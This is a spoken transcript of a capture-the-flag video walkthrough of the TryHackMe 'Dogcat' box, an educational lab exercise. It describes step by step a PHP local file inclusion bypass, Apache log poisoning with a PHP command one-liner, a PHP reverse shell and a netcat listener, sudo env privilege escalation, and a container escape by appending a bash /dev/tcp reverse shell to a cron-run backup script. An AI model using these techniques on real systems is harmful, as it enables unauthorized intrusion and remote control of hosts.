Yo, what's going on, guys? Welcome back. Today we're doing Dogcat. So this is actually a really fun one because at first I thought, I don't know why this was classified as a medium, because as I was going through it I was like, this is not your typical medium. It's pretty easy. So we're gonna go through it, but then towards the end I understand why they classified it as a medium, because you're breaking out of a VM. But we're gonna go ahead and go through it and talk about it anyway. So before we get started, hit that like button, hit that sub button. I really appreciate it, guys. It's the only way the channel can grow, so it helps me out a ton. Also, check out the Discord and the Patreon. There's a lot of good content. The Patreon catalog is growing greatly, and the notes are growing every day. So this is the weekly CTF. So if you guys follow my channel, you know that every week I do a CTF in the live stream. This is the weekly CTF, and then later in the week, a different honeypot video will be coming out as well. So let's go ahead and get into it. First things first, we're going to do just a quick little in-map scan, and normally you guys know I don't run them on here. I will, because of time, I will not run them, but you can see how quick this one will run. That's the only reason I'm going to do it. There's only two things to look at. Really, there's only one thing to look at, and you'll see what I mean. So you really didn't even have to run this, and what I mean is they tell us that it's a website, so right off the bat, we can just go straight to the website. You really don't have to run. And a lot of people always ask me that when I'm doing these CTFs in the live stream. They're like, well, how come you don't run the in-map scan? If it tells me what's going on, I don't need to run it, right? The other thing is, like, there's usually tags. It says right here, exploit PHP, LFI, and break out of a Docker container. Well, if I know I'm doing PHP and LFI, I don't really need to do an in-map scan, just to save you guys a little time if you're ever trying to do it with time constraints. So 1010 118 62. Okay, a gallery of various dogs or cats. What would we like to see? I'm a dog guy myself, so we're gonna go dog. I want to see if I can. I like this one, but this is just my own personal. I want to see if it grabs a different dog every time, because it looks like it does. Because the one I got earlier was that's a cool dog. Was a really cute dog, and that's the one I got earlier. I love that one. So I'm not trying to waste your guys' time with that, but I'm just telling you that's a cute picture. But the first thing, we know we're doing LFI. It says it right here. The other piece is, look, it says right there, view equals dog. Well, right off the bat, the first thing I'm going to try and do, right, is I'm going to try and say, let's see, can we get the Etsy password, right? Okay, sorry, only dogs or cats are allowed. Okay, well, that makes it pretty easy, because we just know that we have to put the dog here, right? Oh, here you go. But it says, warning, include password.php. So it's automatically adding an extension to it. And you can see it's keeping that in the index, it's in the index.php. So what's that tell us? Tells us we need to read this index.php, because what's happening is it's actually going through and it's adding that extension to it, but we don't know what all it's doing in the back end. Meaning, is it validating certain characters? Is it removing certain characters? You can see here, it doesn't look like it's removing our period forward slashes, but it is adding PHP automatically. So we need to figure out how do we get around that. So all we got to do here is, and this is just, you just do a little bit of research. This is a very common technique. So you just do a little research, and you'll see all you gotta do is add a PHP filter, and what it's gonna do is it's actually going to convert it to base 64. And the reason we're gonna convert it to base 64 is simple. We want to view it, not run it, right? Because it's PHP, it's gonna automatically run unless we convert it to base 64, which will then give us the output that we can read. All right, so we're gonna say resource, and then keep in mind on the resource, you have to put dog, because it's looking for dog. We know that, it says right here, and it must include dog. If you remember, it had to include that before. So we say the resource equals dog, and then we just want to read the index. And we don't have to put .php, because we know it's gonna go through it and do it for us. It looks like I missed something. What did we miss? So PHP base 64. Oh, I never put in code. That's on me. if I could type, encode. Okay, and there we go. So now I just do Control A, copy all of that, go to CyberChef, and you can do this command line. You don't have to do it in CyberChef. I always use CyberChef because I like it, for one. For two, it's just so much easier to view for me. So we'll say from base 64, obviously the go, we got to get rid of the go. There we go. Okay, and then we can see right here, we're reading it, and it says, if you look down here and you read it, it actually says, here we go, they're declaring a variable called ext or extension, right? So if we change that extension, which is PHP, it's adding the PHP automatically, and it looks like that with the name dog or cat is the only requirements. So that's pretty easy to get around. So all we have to do now is we can actually go back and we can go to this Etsy password, right? But we just have to tell it, hey, don't add the extension, right? Well, the way we do that, we just read the code. So all we have to do is say, hey, we want to do this with extension, but the only difference is we're going to declare the extension for ourselves. So you'll see what I mean right here. And so all we have to do is say and we're going to say ext because that's the variable name that they declared here. We say equals, and we're put nothing. If you put anything else, keep in mind, like if you're reading a text file, you can put extension equals.txt, whatever. But this is just a regular file. There's no extension, so we need it to read password, not password.txt or anything like that. So we say extension equals nothing. We hit enter, and look at that. We're able to actually read the Etsy password file. So right off the bat, we kind of see that, okay, we can read the password file. Now, this is really good because this means we can start to read stuff. So the first thing I'm going to do is now I'm going to open Burp Suite, and I'm going to start putting this into Burp. And the reason is because I know we're going to have to start building a payload out that needs to be used for probably log poisoning. And I'm just assuming that because this is actually extremely similar to one of the weekly CTFs we did not too long ago. But yeah, so we now know, whoa, okay, I just clicked once, by the way, I didn't hold that down. We now know that we can read these files. So we could go through and actually get the first flag if we wanted to, if we knew where it was at or look for it. But what I'm going to do is go to proxy. I'm going to go here and turn proxy on. I'm just going to refresh this. Now you see it went into burp. We're going to say, okay, cool, take this and send it to repeater. Repeater is a little easier to work with, but we're going to keep this here for now, but we are going to end up changing it. The first thing we need to do is view, can we actually access the log files? So we need to get rid of this Etsy password. And we're going to say var log apache 2 and then access.log because that's what we want to view. So we send that bad boy. Okay, looks like we can view the log. You can see all these requests here. Here is our Etsy password request, etc. So we can view the log. So what we see, if we look at these logs, you see that you actually get the IP, the time, the GET request, blah, blah. But one thing you get is you get this user agent. You see the user agent in here. That's important because that means we can change this user agent to possibly run the PHP commands that we want, and this will read it and run the PHP commands. So we're going to remove that user agent, okay? And we're going to go and start looking. Now, the first thing we can do is we can actually go through here and just start trying to set up a basic PHP script. And that's pretty common. This is pretty common. You just do this and you say PHP system, and then we're going to do get, and then do CMD, and then to close it out, and we're good to go. Okay, so this is the simple system, right? It's saying, hey, system, get this command, run this command, right? Well, we have to tell it what command we want to run. So we have to add a variable in here and say cmd equals, and we're just going to do something like who am I? Doesn't really matter what you run. I'm going to do who am I to see if it works. So we hit send. Okay, and we go to the bottom of the logs and we look. Okay, don't see anything yet, but keep in mind when you're doing this, you may have to do it twice because I'm accessing the logs first. So if I were to go to a different piece of the site and then go to the logs, you'd see it, but usually you have to access it twice to see it. And then look at that, there's the answer, www data. So it's giving us the result. It's telling us, hey, who am I? I'm www data. So that means it's actually running, which is really nice because that means all we have to do is get a little one-liner that we can access. Oh, maybe, there we go. Get a little one-liner in here and we should be good to go. So what we're gonna do is we're actually gonna go to pen test, monkey, reverse shell cheat sheets. And I forget that burp suite proxy's on. We don't really need that anymore. Okay. Pen test monkey, reverse shell cheat sheets. And we just go down to PHP and look at this bad boy. We grab this. We go back to CyberChef because we're going to need to URL encode it. So we paste it in here. And let me make sure you guys can see. Whoops. Just move the whole thing on you. There you go. So you guys can see now. But what you're going to do is you're going to go over here, change the IP address to whatever we are, which if we look, we are 10.10.238. So we say 10.10.238. And then we can leave 1, 2, 3, 4. I'm fine with that. Now all we got to do is URL encode it. All this is a URL has to have certain basically parameters, right? You can't just put semicolons and all these special characters and all this in the URL because it won't read properly. So we're going to say, hey, put this in the format that the URL will read properly. And you can see it actually puts it in this format, which looks like an odd format, but what it's doing is it's putting like the %20 for the spaces and things like that. So we say, okay, cool. Now one thing I noticed is the P is gone for PHP, so make sure that's there. Copy that. Okay, should be good. Now we go back over to our burp suite and we change this user or this command, and we make this whole thing the command. Right? Looks really long, whatever. But now we have to go create a netcat listener. So we say nc lvnp and we say 1, 2, 3, 4 because if you remember, we put it on port 1, 2, 3, 4. We listen. Now, when we actually run this, you see it's sitting there not loading. That's good. Look at that. That's because it's not closing the connection. We actually have a shell now. So that was really easy to get a shell. Like, I don't know about you guys, but I thought that was like a little bit too easy to get a shell, personally. But you can see, okay, we've got a shell. So we just say ls, and you can see there's the flag. So we say cat flag.php, and there's your flag. Boom, this is not a cat dog. Not wrong. If you guys ever watched Cat Dog, that was a good show back in the day, but this is not a cat dog. So I'm just leaving it on the screen for a second because I am blocking the flags so you guys can view it, take a look at it, and whatever. So now all we need to do is say, okay, where's flag 2? And if you just cd back one directory, there's flag 2. So we say ls, and you just say cat flag 2 underscore qmw 7jvay2lvk.txt. There you go. Tryhackme LFI to remote code execution. Boom. Pretty easy, pretty simple. Where it starts to get a little bit harder is this flag 3 and 4. Now flag 3 is super easy. We just say sudo tac l, and you look and it says you can run user bin environment with no issue running it as sudo. Okay, well let's go to GTFO bins. Very common site. And we just say, hey, we want environment. We want sudo. Well, look at this, sudo environment bin shell. So all we have to do to get sudo access is copy that. We say, okay, we're allowed to run sudo user bin environment, and we can just say, okay, bin shell. Now it looks like, whoops, looks like nothing happened. But now if I say, who am I? I'm root. So pretty quickly, we can cd into the root directory, which is usually where the flag is. There's flag3, cat flag3.txt. Okay, and then here's the kind of hint they're giving you, right? Different environments. Now, we don't really need a hint because it says right here we're going to break out of a Docker container, but they're giving us the hint either way. So we want to make sure we verify this. So what we can do is go back into just the regular root directory. So if we say present working directory, we're in the root directory. And we say ls tac la. Right here, we see this hidden file, Docker environment. That's telling us that we're either in a Docker container or there's a Docker container running on this machine. So one way or another, there's a Docker container. So now all we have to do is look for a way out. So if we kind of do some digging and we end up going to copt, we see this backups folder. So we say, okay, cd backups, and there's a backup.sh. So if we say cat backup.sh, okay, so it looks like there's a tar. It looks like it's copying the root container backup.tar, and then it's putting it into the root container. So it looks like we are in the container because they're backing up what's in here to the actual root container. Okay, so we're gonna assume we're in the container right now and we need to break out. So we have root access, so we can write to this file. So now that we write to this file, all we gotta do is get a little reverse shell. So let me pull up my Patreon notes and get my reverse shell here. And we'll just say, okay, we've got our reverse shell, our bash shells. And we'll look, and here's an easy one, right? So what we'll do is we'll grab this. And I've got it. So now all I gotta do is I say echo, and I say bash tac I, and then I do caret and dev tcp, and then the IP I want to call back to. So we need to set up another listener. So file, open tab, make it a little bit bigger. We'll say netcat lvmp, and this time we're going to use port 8888, just something, any random port works. So we're going to say the IP is 10.10.238. So 10.10.238. Okay, and then the port is 8888, and then we just say 0, and we say caret and 1. Now, one thing I would recommend is making sure you have this 100% correct before you click enter, because if you mess this up, you have to restart the box. And the only reason is because now you don't have to. You could nano and recreate it and all that, but if you accidentally overwrite this or anything like that, you can break the functionality. So just don't worry about it. But you can see you have append, and you have the append, and we're gonna append, which 2 carets equals append. So we're gonna append the backup.sh file, and make sure you have your netcat listener going beforehand, because what you'll see what'll happen. So we have this appended, and you'll see that this is actually a cron job that is running on the regular box, on the real box, not on the container. And what I mean by that is it's a scheduled task that is running. And so if we go here and we say cat backup.sh, you can see we've added this in here, and whenever this runs, it's going to run, and when it runs on that machine, we will get a reverse shell. There it is. You see that? We have a reverse shell. So now we can say, okay, ls, there's flag 4, cat flag4.txt. And this is a big one. Tryhackme escalations on escalations on escalations, random characters. But you can see there's the container. So we were inside the container, which isn't just an environment. We were inside the environment, and they were taking backups of that environment using that script. We just took that script and wrote a reverse shell. So when it ran, when the outside container ran it, that's who was the owner of, or who was the runner of that. And as soon as they ran it, we got a reverse shell from the box itself. So we broke out of the container. So pretty fun, pretty easy. But this was, I still don't think it's quite a medium. I would say maybe in between the easy and medium, but it is a fun box. Most of the concepts are very easy. I just think they made it medium because of the Docker container escape. But you can see this was fun. This was a cool little box, and this was the weekly CTF. So I will be covering this in the live stream on Saturday. So check out the Discord, hop in there, and we'll do the live stream. Also keep an eye out for the upcoming video because I'm super excited about it. Thanks, guys.